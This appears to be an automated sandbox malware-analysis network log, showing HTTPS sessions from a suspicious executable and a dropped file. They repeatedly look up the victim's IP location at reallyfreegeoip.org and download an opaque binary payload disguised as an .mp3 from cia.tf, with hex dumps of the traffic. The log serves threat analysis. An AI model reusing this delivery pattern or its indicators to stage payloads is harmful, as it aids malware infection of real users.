                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549739172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:30 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:31 UTC855INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:30 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507079
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uW1P1KmJYJggOFOiG8GUC2v8hvmA36VT08K8Tk7Ip7wXm53gbr07te%2FhSKjbWtB%2FzyFxnMsCPjA94snHKZiMfAN%2F0MqN9XzN1l6PQ3ukAV4j%2BOUEqVsKmw7q%2Fl8nBBxpCmJqS446"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228e25bfd2363-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1404521&cwnd=252&unsent_bytes=0&cid=ea7c257e5c09fe00&ts=472&x=0"
                                                                        2024-11-25 13:59:31 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549746104.21.1.1824432888C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:32 UTC92OUTGET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1
                                                                        Host: cia.tf
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:33 UTC969INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:33 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 960008
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=14400
                                                                        content-disposition: attachment; filename="Ccisayi.mp3"
                                                                        etag: W/"ea608-19360808993"
                                                                        last-modified: Sun, 24 Nov 2024 23:27:36 GMT
                                                                        x-powered-by: Express
                                                                        CF-Cache-Status: REVALIDATED
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mx%2BynmMIq5ByGVV9gC022cuNRpL%2F9HL6%2FA50jfeCJdEGpx8mxPl6JOM3GFavMbc3ZiJtDN5BgubAUz%2BKbHxFjS%2BP0hJKXaKScexFo7CfkOMb5fC08a6F0b0%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228eee9637d08-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2035&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2808&recv_bytes=706&delivery_rate=1415414&cwnd=185&unsent_bytes=0&cid=cc00ae4c22f3265b&ts=579&x=0"
                                                                        2024-11-25 13:59:33 UTC400INData Raw: be d7 5d fb 75 20 81 4b e1 4c b2 9d d9 3a db 85 a7 17 e3 84 c5 0f 7d 61 75 7e 94 e2 6c d7 ff 2c 95 b4 89 3f ef 3f 57 6e 79 4d 3e f4 11 8c ba c4 34 05 2a 2a 2d d6 d5 3d 65 e0 65 26 94 e9 75 15 9c b8 c5 32 8f e9 06 14 cf c5 15 03 21 ff d4 4b 6c a5 55 35 37 f0 48 3b fb d5 b9 fb c1 6f 26 04 50 0d 30 06 dd c9 34 64 d5 1d 15 4a b9 57 41 a3 db 9b f2 54 e4 5c 14 eb ce 4e 8d 26 dc 53 67 10 e3 58 3b ff 52 93 16 51 43 57 57 67 6c 6c a0 f2 c4 59 3d 6c cc 30 40 62 9c f2 24 d6 73 20 f3 bc 4f 27 d8 8f 9e a0 06 b9 e5 15 ac fa 95 78 ee ee 56 a5 15 d9 ca 9d 76 e6 f7 e3 a9 a1 61 30 0c 00 84 ab 32 4d 49 be b0 4b d3 82 48 75 0c 33 8f 12 74 dc 74 4b 5a 65 8f 73 71 40 39 6d 16 a8 7c 16 84 51 eb 0a 01 f3 dd aa 36 70 6e ab 4e 72 9a 72 b7 ce 9d 61 54 da 17 d1 7e cc e3 d8 e3 8d 8f
                                                                        Data Ascii: ]u KL:}au~l,??WnyM>4**-=ee&u2!KlU57H;o&P04dJWAT\N&SgX;RQCWWgllY=l0@b$s O'xVva02MIKHu3ttKZesq@9m|Q6pnNrraT~
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: b7 29 f4 18 b3 2b 7e d7 c4 06 15 18 01 3d d0 fb 49 91 a4 a9 64 95 aa 40 c8 75 3f 06 e7 da 9c 2c 18 bd 42 a2 86 11 d2 37 43 14 38 46 45 47 e3 ef ab ce 06 3c 65 83 a9 2c db f1 14 b0 55 71 b3 da b1 4b 3f 4e 8b fd 7d 00 cc a4 c4 dc f8 1e 46 69 c4 29 8b ad d3 ba d4 b8 68 e9 eb e8 ea 81 c9 a1 93 b1 52 30 f6 5c 05 3c cf e6 b6 84 0d 38 17 bb 3f 6c 63 91 66 53 68 0f d2 60 52 f2 3d 39 e8 05 0c ff 7b a3 c6 89 d4 30 60 8c da 2c 71 51 53 ee 14 60 ae 61 03 1d 13 3e bb c7 4d 0c 5e 5d 55 0a 34 77 04 05 ec f3 94 9c d3 87 d2 77 f2 69 50 73 a6 3c fe 15 7a eb aa 2b 27 f0 7a c2 c6 75 7d ee 06 cc 6f 14 20 1f e9 8e b3 8f a3 0d 6d 0d b7 e1 70 8c 3c 9a bc a2 91 ff 76 c4 7d ad 18 5d 9d 5b 85 18 ad 03 e8 43 87 e2 21 e2 dd af 36 30 3b ba 27 d2 1d ee 0a fb b8 bb 54 ed 1d d7 91 ff b3
                                                                        Data Ascii: )+~=Id@u?,B7C8FEG<e,UqK?N}Fi)hR0\<8?lcfSh`R=9{0`,qQS`a>M^]U4wwiPs<z+'zu}o mp<v}][C!60;'T
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: 3d 7f 7a 9e a6 58 5a 56 ac 5a f4 05 8a 89 b2 91 05 90 ba 00 2c 93 79 b4 ff 65 04 e9 c1 aa d5 22 a9 26 8a 41 64 54 98 d5 5f 4f 10 92 6f f2 3a cd 95 21 a8 d1 4d 3c 6b 62 69 69 d4 ad b8 dc 41 f7 f7 34 05 91 ae 80 a5 76 74 46 e8 c3 19 23 97 31 44 54 5e 1d 6c 9d ba 06 7e cf 25 f4 8e c7 5a ea 07 aa 1d 3f bb 0a 04 37 c0 50 3b fd 7b 34 e1 6f 8c 72 db 2e b0 e2 81 5f 99 0d a7 73 c8 f4 10 93 5b 38 cc 3c 6c 8b 59 c3 97 31 9c b8 a1 e1 c8 0f 3a 1e 9a bd e9 94 00 35 b3 5a 03 ed 1e f7 9d 40 8a 36 d4 79 8c d3 d0 d7 d0 bc 35 f5 b7 3e a3 45 cc b4 0b 0a d2 db db 7f 16 21 b7 49 d6 62 25 32 30 f8 18 ba a0 00 8d 42 7f b1 47 dc 54 2e 4e 03 7d d7 14 8c 7e e0 54 9b f3 8c f1 f6 e4 d0 0a 41 07 3a 45 1d 27 aa b9 cc 9a 12 ec 56 9e a0 ae 80 fc d6 24 48 94 71 28 c0 3e 54 59 82 98 07 79
                                                                        Data Ascii: =zXZVZ,ye"&AdT_Oo:!M<kbiiA4vtF#1DT^l~%Z?7P;{4or._s[8<lY1:5Z@6y5>E!Ib%20BGT.N}~TA:E'V$Hq(>TYy
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: 06 25 95 1b 31 77 56 ef ed c7 19 e0 ac a2 8c a7 52 71 8d c0 8d 0b 5a ae 6c bf 53 0a 1f f4 5e 9f 7f f6 0a 09 c3 a3 d5 ce 9b c4 9c 50 96 9d dc 5e c3 9d bf c3 f9 59 a2 8d 30 03 09 d2 37 aa e2 0c 17 2f e5 8f 62 06 3d 55 03 a9 23 95 18 84 a9 32 6b e8 11 e7 51 8a a6 8b 8b 3c c9 32 01 fe 80 89 d0 89 5d 87 a5 dc 51 af 49 9f 8b 4f c8 62 38 d0 e6 d1 c7 b1 d4 50 c4 a6 6f 0c 35 9f fd 23 cf cd 42 01 8c 48 5d d7 86 e0 85 85 22 6f f0 42 bd 10 5b a1 b6 c3 b0 c5 1b e4 04 f6 2e a9 c8 e7 13 0e 06 d1 aa 1d 3a 67 43 82 e2 a2 33 4b 63 8f a3 17 4f 43 73 2f ea 5a 0d ef 26 e6 a2 0f bb 9e b3 ab e8 f9 85 45 6c 13 3b 1b c8 4e fe 0c 2e bd bc 45 f5 18 cd b4 45 d5 ac 39 73 3e 1f d8 e6 fa 17 b6 ce ca e7 82 17 de 5e 8c 38 7b 8b f3 59 31 bb 34 7e 4a 2e 18 d2 16 e6 97 6f bd c5 23 44 eb 05
                                                                        Data Ascii: %1wVRqZlS^P^Y07/b=U#2kQ<2]QIOb8Po5#BH]"oB[.:gC3KcOCs/Z&El;N.EE9s>^8{Y14~J.o#D
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: bd 98 d5 b2 18 33 a3 f4 e4 bf 11 25 89 e4 f2 b1 f0 14 21 74 0f 2a 4e 21 71 3c db 7f 4f 97 ad a8 40 46 ee 19 ad b3 26 ee e7 2a 0f ea 53 23 df 54 a3 50 3f 06 77 e0 0a 51 1f 48 15 72 09 80 05 ae bc 73 7f ac f1 2d 46 b3 c1 22 4d c8 42 74 78 e3 ae 05 25 ff 34 5b 79 02 16 db 88 e9 c9 b9 4a 32 d1 25 53 2f fc 04 95 56 ac 0b d0 11 ff ce 41 c5 70 5e 9a 24 16 4e c5 95 da 3a b4 96 7e d1 bf 86 10 93 6e 6b dd 9e 7b a6 77 b1 ac d9 18 1d 69 68 46 8e 1e 85 39 ad 6b 19 25 88 e5 2e ad e3 31 a5 8c 98 ef dd 1b 40 c7 b1 e3 f5 55 ce f5 61 50 fe e6 fe c8 1a f0 83 5b 64 70 68 77 ac 44 45 63 98 06 9c 62 bf c0 dd 39 da 02 36 ee c0 32 93 30 1c 4c 17 96 b5 25 e6 a9 0f 57 5f 56 36 e2 b1 41 3b 90 c2 f3 0d 1e 44 ca d0 0d 80 10 66 18 e9 64 60 4e a9 6f 73 04 8b f2 b3 21 03 88 b3 a9 33 df
                                                                        Data Ascii: 3%!t*N!q<O@F&*S#TP?wQHrs-F"MBtx%4[yJ2%S/VAp^$N:~nk{wihF9k%.1@UaP[dphwDEcb9620L%W_V6A;Dfd`Nos!3
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: 5e 0e b9 0d 65 bc fe b2 e1 ec 18 83 8a f8 6d c5 30 f0 63 54 00 af 97 06 48 c9 98 ff a2 67 bf 23 e3 c2 7d 5c 6a b8 92 17 8c a8 cb 80 fc c0 d8 0d 48 44 55 ca 2d 04 e4 de 58 6a 29 d4 40 cf bd d6 b2 d0 c2 3f 11 be 2d d4 20 a6 20 4a 29 d2 b5 43 eb 5c 89 8b ad d2 06 cf 80 d0 3f 3c c2 67 34 1c 34 ee cb d1 b5 70 34 74 59 da a6 f8 81 92 49 10 93 9a 92 b3 ca d0 3b d9 5c ff 29 98 e9 92 3b bd 70 28 68 92 22 7e 10 bc 38 f8 b0 cf 26 ca 41 4d 92 fa 30 e5 a0 63 8c c8 74 81 a5 73 10 aa eb 05 dc e3 29 41 d0 1f 27 a1 0c d6 69 c7 0e 64 c9 f7 7a 3c 1b c8 aa 52 08 77 d7 26 d8 e0 56 d3 d8 5a 87 21 12 01 8f 33 c8 ce ff 83 ec 8e 5c 71 55 7e 4a 3b 17 05 27 78 d0 6c 75 98 4b 7b 8c cd 98 48 31 59 ff 91 38 67 51 ac bc 30 92 fc 90 59 20 fa 51 72 e6 7c e9 08 3c 36 dd 2e 4a bb fe 4f 93
                                                                        Data Ascii: ^em0cTHg#}\jHDU-Xj)@?- J)C\?<g44p4tYI;\);p(h"~8&AM0cts)A'idz<Rw&VZ!3\qU~J;'xluK{H1Y8gQ0Y Qr|<6.JO
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: 03 63 3b 0c cc 17 d6 c8 f7 0b 79 83 bb b8 fb 9a 00 4f c8 ed 99 46 66 f9 9f 87 a8 22 a3 6f 6f aa 8a a9 49 58 48 ad 9f c4 2f 32 68 e8 0b d5 b4 8f 65 ae 86 aa e9 60 0f 8d 34 0c 7e 4e a7 c0 57 c9 66 47 fa fb cd 5a eb f9 5a f2 c0 05 f8 33 28 e5 14 9d 59 b9 94 9d c1 fc 6d 8f 7c a5 ce 6a 77 84 3a 65 d8 be 77 af de ea b3 2e 73 63 e9 68 36 10 d2 7b d2 a7 22 35 e0 6a 79 1c e8 d4 a1 6c 0f a1 11 ce 7c ac df 3f 8c 2a 99 e6 25 2e 9a b1 60 0d ec 77 c5 dd d2 8f 31 6b 23 1c 56 4e 7c 2d 76 dc c7 a7 e7 6f 89 7c a1 31 ee 40 00 98 e9 ae 60 2d c8 f5 0c 35 9a 3c 99 22 b7 a5 20 1e 66 a5 af e7 5b 40 46 89 35 45 06 c8 6a 45 b6 a6 8e 74 9f 03 a3 ae 1a 5d 1e 61 ea 27 d0 eb 54 0d 92 48 7c cb 2a f5 94 22 c0 7d ea a5 ae 02 0e 64 ee 37 a3 aa 1c 2b 67 65 0e 8b 9f 6f fd 9e ad b9 4e 21 86
                                                                        Data Ascii: c;yOFf"ooIXH/2he`4~NWfGZZ3(Ym|jw:ew.sch6{"5jyl|?*%.`w1k#VN|-vo|1@`-5<" f[@F5EjEt]a'TH|*"}d7+geoN!
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: f7 f4 81 31 40 66 2d ad e4 de 24 c1 e9 c5 e8 09 b4 bb f7 a9 c9 6a e8 4a b6 f0 39 b4 a6 96 1e 6b 11 26 a0 e9 cc 0e a6 7c 66 e0 e5 1d 9f ff f2 20 88 36 45 44 ec fd 28 33 d7 8e ba 6c 2e cc 0e da 54 32 06 03 68 44 c5 3e c9 af 21 a7 84 24 8b e4 bb fa 84 ca 41 7c cc 0f dd 20 33 8e 25 31 5b 36 b5 00 02 62 01 8e 6b bf be 02 3b 9f 65 fc fb 97 4d 47 15 29 0c ce ad 99 f5 99 a3 83 20 d7 13 6b b5 8d 0f 03 fe 41 65 9d a3 97 ac e7 29 89 56 96 5f d3 f2 48 09 90 52 21 60 a7 d5 5f 88 11 ae 5b 95 b2 35 21 bd 7c ba a7 1a a9 7b 54 f5 14 3e f9 82 fd af 19 64 3c 6e 75 2a 97 49 80 7d 6a 29 a6 4a a6 7e 8f 41 44 e9 51 36 9a 5c 90 00 1f 48 6f 92 48 06 e0 13 41 3f 19 fa 96 84 a0 14 4a 80 e7 03 9e 7d de b5 0c 73 14 d0 27 6c 81 72 a8 56 10 21 b4 be 7e f2 0b 13 ff d1 8c de 02 cd b3 fb
                                                                        Data Ascii: 1@f-$jJ9k&|f 6ED(3l.T2hD>!$A| 3%1[6bk;eMG) kAe)V_HR!`_[5!|{T>d<nu*I}j)J~ADQ6\HoHA?J}s'lrV!~
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: ef a6 34 49 54 a9 2f 35 ed d9 78 e9 43 1b cb 96 78 b2 79 1f c3 4b 64 d1 48 05 1f 62 1e b5 9e 16 a8 b1 15 04 25 93 0f b1 8d 97 0c 7a c2 9f db 4b b3 ce 90 ac 8c 87 92 5c 7e 94 da b7 8d 9c e9 2f 8c 59 29 14 40 ea fd 73 f4 5b f3 9d fe 56 e2 79 06 09 26 6c 29 70 99 a1 0a 21 df c8 2a 64 15 2f e4 7f 00 c4 a7 a1 bb 1a ba 1f 6b 24 9d 38 fd 69 1a e7 a1 b6 5d 7c 78 36 e8 9f b6 e2 28 09 e9 a7 8e 84 92 4a 8e 2d c4 56 dc 0b 20 0c 02 db 1d c0 13 bf e9 47 cc 32 6b f8 f1 32 85 ef ff 65 34 42 a5 77 0e c3 13 c3 82 7c 09 89 b0 83 9a 6b 56 20 86 91 ef 6e b4 d7 89 e1 ba 94 47 18 00 9f 46 b2 41 be 87 ff 43 c3 b8 67 3d 9c 6b eb b3 ec 11 08 8f 82 8d 97 53 44 02 11 be 82 ba ef 3a 2a df d5 4e 23 52 a1 6b 60 9a 98 26 93 69 6c 8a a7 6f e2 9f 3d 5c b2 34 a0 db 06 ab b3 f9 e6 bc 1c cd
                                                                        Data Ascii: 4IT/5xCxyKdHb%zK\~/Y)@s[Vy&l)p!*d/k$8i]|x6(J-V G2k2e4Bw|kV nGFACg=kSD:*N#Rk`&ilo=\4
                                                                        2024-11-25 13:59:33 UTC1369INData Raw: 16 f3 98 81 b6 2e 27 d7 f0 5e 3d 83 3b 33 a9 0d 17 89 1f 28 33 29 ba 75 11 72 cc dd d0 49 c0 96 d4 ff 4e 8d 14 18 de fa 54 8b c3 47 6e 79 ac c7 d7 bc e5 6b 04 f2 5c 71 b0 cd 68 eb 2f 67 17 cc 77 53 32 a7 da c7 a6 24 71 9c 26 3d a4 96 f9 32 2f e9 d9 0e 93 24 89 a4 13 8d 94 fe 91 90 65 a9 d5 23 c8 5f ff cb 6c f4 40 3c 6c 56 91 b2 75 d7 19 73 6a da d5 0d 01 4d 61 96 f7 04 a6 8b a2 49 88 6b f9 bf ad 37 02 1e 74 fd 7a 10 78 77 a9 55 23 58 85 24 5f e5 d5 b2 b5 93 c0 e3 28 02 6c 48 d5 84 3d 16 7d d3 9d 01 1c 83 b7 d6 37 19 b0 3a 08 76 d4 5c 33 54 f1 d7 b6 a7 d5 f0 12 d0 6d a1 43 de b0 cb 00 05 e6 cc 59 82 a4 1d cf c3 37 0d a8 ad f1 5f 6e c0 08 31 0b c4 3c 21 8f 7d f2 5b ce 90 44 e1 7f 23 7f d3 46 5b 6c c6 27 5b 98 8d e5 e4 73 26 b0 69 8b 6b 55 35 d0 e8 58 f7 be
                                                                        Data Ascii: .'^=;3(3)urINTGnyk\qh/gwS2$q&=2/$e#_l@<lVusjMaIk7tzxwU#X$_(lH=}7:v\3TmCY7_n1<!}[D#F[l'[s&ikU5X


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549752172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:33 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:34 UTC851INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:34 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507083
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QiWpzTUdIz9yfP17r00TWcomdpYnxehg%2FF6pyuqHoGo7bvWNqqwSj4g%2FCsmG6mFn5miNPHDd9i3R09a10Q23FRlUh8ATog6N4Fd16QXxsCSY8FSabZDUNJ4fl%2FZrK7ZR4ZF7ATEC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228f5aea043cd-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1808049&cwnd=252&unsent_bytes=0&cid=be3347e00095bb81&ts=465&x=0"
                                                                        2024-11-25 13:59:34 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549759172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:36 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:37 UTC851INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:37 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507086
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bmmvjCR5OVlaf%2FxXTxe1K%2FWbyFTgVH%2F2qodtWt14NAgxAUp7huYB1ObtbjpFCiomCgApEQzrGEl1heul2hI2FA0anF0M14GKRgV4IDMP4Zy4YIkGUr6venXGsnckUYqqMvNZb0a"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82290898ca4259-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2153&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1332724&cwnd=231&unsent_bytes=0&cid=e280730f9c00f738&ts=570&x=0"
                                                                        2024-11-25 13:59:37 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549767172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:39 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:40 UTC848INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:40 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507089
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo2c9ntrJPPXcRHNDvpLsbuE1Zw3EVysm7Bpl2TqtOumwdEL2m8TnE0cEiZTwD1KoWco2ZpQdNMwEgkbtwXq1Et1eRNa318pzhWT%2B5LrMgV8IlREkATosLZpElN0eQJeCnPynXvn"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e82291ba9ce5e65-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11525&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1787025&cwnd=242&unsent_bytes=0&cid=057dc44a3dc83391&ts=465&x=0"
                                                                        2024-11-25 13:59:40 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
